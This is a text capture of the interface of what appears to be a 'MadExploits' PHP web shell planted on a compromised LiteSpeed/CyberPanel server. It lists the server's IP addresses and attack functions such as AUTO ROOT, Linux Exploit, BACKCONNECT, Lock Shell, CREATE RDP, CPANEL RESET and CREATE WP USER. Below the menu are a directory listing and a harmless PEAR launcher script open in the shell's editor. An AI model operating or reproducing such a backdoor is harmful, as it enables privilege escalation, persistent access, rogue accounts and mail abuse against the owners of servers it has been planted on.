Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
lsphp83 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
lsphp
17.26
MB
-rwxr-xr-x
pear
888
B
-rwxr-xr-x
peardev
909
B
-rwxr-xr-x
pecl
822
B
-rwxr-xr-x
phar8.3
14.9
KB
-rwxr-xr-x
phar8.3.phar
14.9
KB
-rwxr-xr-x
php
17.36
MB
-rwxr-xr-x
php-config
4.98
KB
-rwxr-xr-x
php-config8.3
4.98
KB
-rwxr-xr-x
php-helper
4.65
KB
-rwxr-xr-x
php-maintscript-helper
9.55
KB
-rwxr-xr-x
php8.3
17.36
MB
-rwxr-xr-x
phpdismod
7.2
KB
-rwxr-xr-x
phpenmod
7.2
KB
-rwxr-xr-x
phpize
4.46
KB
-rwxr-xr-x
phpize8.3
4.46
KB
-rwxr-xr-x
phpquery
6.23
KB
-rwxr-xr-x
sessionclean
2.77
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pear
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/lsws/lsphp83/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/lsws/lsphp83/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/lsws/lsphp83/share/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/lsws/lsphp83/share/php" INCARG="-d include_path=/usr/local/lsws/lsphp83/share/php" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"
Close